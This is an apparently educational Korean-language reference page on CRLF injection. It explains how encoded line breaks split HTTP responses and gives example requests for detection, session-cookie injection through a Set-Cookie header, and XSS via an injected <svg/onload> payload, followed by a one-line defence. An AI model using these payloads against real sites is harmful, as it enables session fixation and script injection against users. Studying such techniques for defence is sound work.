CRLF Injection

CRLF Injection

in

๐Ÿ” Introduction

CRLF Injection์€ Carriage Return Line feed Injection์˜ ์•ฝ์ž๋กœ ๊ฐ ๊ฐœํ–‰๋ฌธ์ž๋ฅผ ์˜๋ฏธํ•˜๋Š” CR(\r) LF(\n)์„ ์ด์šฉํ•˜์—ฌ HTTP Request ๋˜๋Š” Response๋ฅผ ๋ถ„๋ฆฌํ•˜์—ฌ ๊ณต๊ฒฉ์ž๊ฐ€ ์˜๋„ํ•œ ๋™์ž‘์„ ์ˆ˜ํ–‰์‹œํ‚ค๋Š” ๊ณต๊ฒฉ ๊ธฐ๋ฒ•์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค.

- Name ASCII Code URL Encode Char
CR Carriage Return ASCII 13 %0D \r
LF Line Feed ASCII 10 %0A \n

๐Ÿ—ก Offensive techniques

Detect

XSS์™€ ๋™์ผํ•˜๊ฒŒ HTTP Request ๋‚ด ์‚ฌ์šฉ์ž ์ž…๋ ฅ์ด Response์— ๋ฐ˜์˜๋˜๋Š” ๋ถ€๋ถ„์ด ์ฃผ์š” ํฌ์ธํŠธ์ด๋ฉฐ, Request์—์„œ \r\n ์ฆ‰ %0d, %0a๋ฅผ ์ด์šฉํ•˜์—ฌ ๊ฐœํ–‰ํ•  ์ˆ˜ ์žˆ๋‹ค๋ฉด ์ทจ์•ฝํ•œ ๊ฒƒ์œผ๋กœ ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Request

GET /redirect?location=/abcd%0d%0a1234

Response

HTTP/1.1 200 OK
Location: /abcd
1234

Exploitation

CRLF Injection ๊ตฌ๋ฌธ์ด ํ—ค๋”์— ๋ฐ˜์˜๋˜๋Š” ๊ฒฝ์šฐ ์ž„์˜๋กœ ์ฟ ํ‚ค๋ฅผ ์‚ฝ์ž…ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

GET /redirect?location=ws://%0d%0aSet-Cookie: session=attackersessions;
HTTP/1.1 200 OK
Location: ws://
Set-Cookie: session=attackersessions;

XSS

CRLF Injection ๊ตฌ๋ฌธ์ด ํ—ค๋”์— ๋ฐ˜์˜๋˜๋Š” ๊ฒฝ์šฐ \r\n\r\n ๊ณผ ๊ฐ™์ด ๋‘๋ฒˆ ๊ฐœํ–‰ํ•˜์—ฌ Response body ์˜์—ญ์— ์ž„์˜๋กœ HTML ์ฝ”๋“œ๋ฅผ ์ถ”๊ฐ€ํ•˜์—ฌ XSS์™€ ๋™์ผํ•˜๊ฒŒ ์‚ฌ์šฉ์ž ๋ธŒ๋ผ์šฐ์ €์—์„œ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

GET /redirect?location=ws://%0d%0a%0d%0a<svg/onload=alert(45)>
HTTP/1.1 200 OK
Location: ws://

<svg/onload=alert(45)>

๐Ÿ›ก Defensive techniques

์‚ฌ์šฉ์ž ์ž…๋ ฅ ๊ฐ’์—์„œ CR(\r)LF(\n)๊ฐ€ ์‹ค์ œ ๊ฐœํ–‰๋˜์–ด ๋ฐ˜์˜๋˜์ง€ ์•Š๋„๋ก ์ œํ•œํ•ฉ๋‹ˆ๋‹ค.

๐Ÿ•น Tools

๐Ÿ“Œ References